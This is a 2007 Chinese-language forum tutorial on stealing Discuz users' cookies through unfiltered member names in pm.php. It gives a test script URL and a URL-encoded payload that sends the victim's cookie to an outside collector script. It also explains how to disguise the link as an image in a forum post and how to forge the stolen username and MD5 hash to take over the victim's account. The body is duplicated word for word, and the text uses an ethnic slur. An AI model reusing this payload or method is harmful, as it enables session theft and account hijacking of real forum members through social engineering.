跨站腳本攻擊+Cookies欺騙(Discuz篇)
更新時(shí)間:2007年01月16日 00:00:00 作者:
這次我拿Discuz示范給大家看,首先我們都知道,Discuz在pm.php的程式中,并沒有對(duì)
會(huì)員名字做過濾,導(dǎo)致我們可以寫入一些script.
聰明的同學(xué)們,想到了嗎?我們正可以利用這個(gè)漏洞寫一段獲取cookies的script.
這是要像看到顏色 就會(huì)反應(yīng)的!(取自 數(shù)學(xué)補(bǔ)習(xí)班= =")
所以我們先從本端 獲取自己cookies看看...
例句:
http://www.abc.com/pm.php?action=send&username=看啥?"><script>alert(documents.cookie)</script><
OK? 接下來 我們?yōu)榱艘@取別人的cookies 所以采用跨站臺(tái)的方式,
首先把讓對(duì)方看了我們精心構(gòu)制好的URL.連了之后會(huì)到我們構(gòu)制好的php or asp 程式里面.
并把對(duì)方自己的cookies寫入 我們的程式中...(如果需要 請(qǐng)googles搜尋 大陸狗 那邊一堆)...
所以啦~獲取到對(duì)方cookies之后,我們找自己在該論壇的cookies記錄..
找到之后 把cookies里面的資訊改成對(duì)方的使用者名稱,以及加密過的md5碼...
切記md5碼是不可以反逆的~
現(xiàn)在我把原理說完ㄌ...開始實(shí)戰(zhàn)吧~~小雜碎 快來阿!
現(xiàn)在已經(jīng)知道pm.php的bug. 我們也已經(jīng)把php程式上傳準(zhǔn)備完成.
接下來 我們到論壇發(fā)link! P.S. 有些論壇 還可以利用 頭像 來欺騙...
全看個(gè)人的思維....(想起數(shù)學(xué)老師ㄌ= =")
我貼了個(gè)問電腦問題的文章連結(jié),并附上圖片...(嘿嘿重點(diǎn)在圖片拉~)
我假設(shè)有一個(gè)假網(wǎng)址,http://myweb.hinet.net/uarestupid/home1/XXX.jpg
隨便你寫 只要看起來像個(gè)圖片 連結(jié)就夠了....
并把http://myweb.hinet.net/uarestupid/home1/XXX.jpg加上我們漏洞的連結(jié),
所以看起來就是這樣:
http://myweb.hinet.net/uarestupid/home1/XXX.jpg
以上這段圖片link看起來大家都毫不考慮的認(rèn)為真的是圖片...
其實(shí)連結(jié)到,
http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open("%68%74%74%70%3A%2F%2F%6D%65%6D%62%65%72%73%2E%6C%79%63%6F%73%2E%63%6F%2E%75%6B%2F%6A%65%72%65%6D%79%68%63%77%2F%68%2E%70%68%70?"%2Bdocuments.cookie)%3C/script%3E%3Cb%22
以上我已經(jīng)url編碼過了,用功的同學(xué)用cookies搜一下吧...
所以呢 他按了圖片連結(jié)后....把自己的cookies送出去了 = =" 但是他還是可以看到圖片...
會(huì)員名字做過濾,導(dǎo)致我們可以寫入一些script.
聰明的同學(xué)們,想到了嗎?我們正可以利用這個(gè)漏洞寫一段獲取cookies的script.
這是要像看到顏色 就會(huì)反應(yīng)的!(取自 數(shù)學(xué)補(bǔ)習(xí)班= =")
所以我們先從本端 獲取自己cookies看看...
例句:
http://www.abc.com/pm.php?action=send&username=看啥?"><script>alert(documents.cookie)</script><
OK? 接下來 我們?yōu)榱艘@取別人的cookies 所以采用跨站臺(tái)的方式,
首先把讓對(duì)方看了我們精心構(gòu)制好的URL.連了之后會(huì)到我們構(gòu)制好的php or asp 程式里面.
并把對(duì)方自己的cookies寫入 我們的程式中...(如果需要 請(qǐng)googles搜尋 大陸狗 那邊一堆)...
所以啦~獲取到對(duì)方cookies之后,我們找自己在該論壇的cookies記錄..
找到之后 把cookies里面的資訊改成對(duì)方的使用者名稱,以及加密過的md5碼...
切記md5碼是不可以反逆的~
現(xiàn)在我把原理說完ㄌ...開始實(shí)戰(zhàn)吧~~小雜碎 快來阿!
現(xiàn)在已經(jīng)知道pm.php的bug. 我們也已經(jīng)把php程式上傳準(zhǔn)備完成.
接下來 我們到論壇發(fā)link! P.S. 有些論壇 還可以利用 頭像 來欺騙...
全看個(gè)人的思維....(想起數(shù)學(xué)老師ㄌ= =")
我貼了個(gè)問電腦問題的文章連結(jié),并附上圖片...(嘿嘿重點(diǎn)在圖片拉~)
我假設(shè)有一個(gè)假網(wǎng)址,http://myweb.hinet.net/uarestupid/home1/XXX.jpg
隨便你寫 只要看起來像個(gè)圖片 連結(jié)就夠了....
并把http://myweb.hinet.net/uarestupid/home1/XXX.jpg加上我們漏洞的連結(jié),
所以看起來就是這樣:
http://myweb.hinet.net/uarestupid/home1/XXX.jpg
以上這段圖片link看起來大家都毫不考慮的認(rèn)為真的是圖片...
其實(shí)連結(jié)到,
http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open("%68%74%74%70%3A%2F%2F%6D%65%6D%62%65%72%73%2E%6C%79%63%6F%73%2E%63%6F%2E%75%6B%2F%6A%65%72%65%6D%79%68%63%77%2F%68%2E%70%68%70?"%2Bdocuments.cookie)%3C/script%3E%3Cb%22
以上我已經(jīng)url編碼過了,用功的同學(xué)用cookies搜一下吧...
所以呢 他按了圖片連結(jié)后....把自己的cookies送出去了 = =" 但是他還是可以看到圖片...
相關(guān)文章
網(wǎng)友舉報(bào):屁屁寬頻軟件自帶木馬病毒(圖)
網(wǎng)友舉報(bào):屁屁寬頻軟件自帶木馬病毒(圖)...2007-01-01Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷
Windows 2003 Enterprise Edition IIS6 .ASP目錄執(zhí)行缺陷...2007-02-02Advanced SQL Injection with MySQL
Advanced SQL Injection with MySQL...2007-01-01再探九酷網(wǎng)絡(luò)個(gè)人主頁空間管理系統(tǒng)
再探九酷網(wǎng)絡(luò)個(gè)人主頁空間管理系統(tǒng)...2007-01-01